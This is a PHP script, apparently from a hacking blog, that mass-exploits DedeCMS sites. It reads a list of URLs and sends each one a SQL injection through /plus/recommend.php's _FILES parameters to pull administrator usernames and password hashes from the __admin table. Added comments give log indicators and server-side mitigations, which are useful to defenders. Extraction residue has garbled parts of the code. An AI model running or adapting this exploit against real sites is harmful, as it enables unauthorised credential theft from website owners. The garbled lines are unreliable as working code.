<?php
/*
 * Command-line script, reproduced as extracted. It reads a text file of site
 * addresses and, for each entry, requests /plus/recommend.php with a query
 * string whose `_FILES[type][...]` parameters carry a SQL fragment, then
 * prints whatever the response contains between the <abc> ... </abc> markers.
 *
 * Defender notes:
 *  - The SQL fragment names the columns userid and pwd and a table ending in
 *    "__admin", so a successful request discloses CMS administrator
 *    credential data.
 *  - Log indicator: requests for /plus/recommend.php whose query string has
 *    parameter names beginning with `_FILES[`. Legitimate uploads never put
 *    `_FILES` in the query string.
 *  - Mitigation is on the server side: run a vendor-patched DedeCMS release,
 *    reject request parameters named after PHP superglobals at the edge, and
 *    rotate administrator passwords if such requests appear in the logs.
 *
 * NOTE(review): the "[email protected]" fragments look like e-mail-obfuscation
 * residue from the hosting page. They are left exactly as extracted, so this
 * listing is not valid PHP in its current form.
 */

// Banner: tool name, author contact and usage. The single argument is a text
// file of collected site URLs.
print_r( " +------------------------------------+ DEDECMS批量爆菊利用工具 By :Sunshie QQ:1141056911求交流 Usage: $argv[0] Filename Example: php.exe $argv[0] url.txt url.txt是你采集的网址文件! +------------------------------------+ \r\n\r\n\r\n" );

// First command-line argument: path of the host list.
$filename=$argv[1];

// Prints a message when the list file is missing; execution is not stopped here.
if(!file_exists($filename)) echo "o(╯□╰)o你妹的 你采集的文件呢?\r\n";

// Load the list, split it on "\n", then strip spaces and any leftover CR/LF
// characters from every entry.
$conts = file_get_contents($filename);
$arrConts = explode("\n",$conts);
$arrConts=str_replace(" ","",$arrConts);
$arrConts=str_replace("\r","",$arrConts);
$arrConts=str_replace("\n","",$arrConts);
//print_r($arrConts );

// One request per list entry; the formatted result line is echoed immediately.
for($i=0;isset($arrConts[$i]);$i++){
    echo fuckdede($arrConts[$i]);
}

/**
 * Builds the request URL for one host, fetches it and formats a report line.
 *
 * @param string $sb Entry from the list file; any "http://" in it is removed
 *                   before the URL is rebuilt.
 * @return string Report line with the host and the text matched between the
 *                response markers.
 */
function fuckdede($sb){
    $sb=str_replace("http://","",$sb);
    // Target URL: /plus/recommend.php with `_FILES[type][...]` passed as query
    // parameters. The tmp_name value holds the SQL fragment, and the hex
    // literals 0x3C6162633E / 0x3C2F6162633E are the <abc> and </abc> markers
    // wrapped around the selected userid:pwd pairs.
    $expp="http://".$sb."/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%[email protected]__admin`%23";
    // NOTE(review): garbled by the extraction (see header note); presumably an
    // assignment of the fetched response body to $exp, which is read on the
    // next line.
    [email protected]_get_contents($expp);
    // Capture everything between the markers in the response body.
    eregi("_<abc>(.*)</abc>_", $exp, $arr);
    // Swap the markers for display delimiters. $arr[0] is used without
    // checking whether the pattern matched.
    $exploit=str_replace("_<abc>", "==fuck", $arr[0]);
    $exploit=str_replace("</abc>_", "fuck==", $exploit);
    return "网址:".$sb."注入结果 :".$exploit."\r\n--------------------------\r\n";
}
?>
<span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 14px; line-height: 1.5em;">以上代码保存为ANSI格式</span>
效果如下
<img alt="" src="http://www.hackqing.com/pic/image/20140304/20140304020823_50674.jpg" />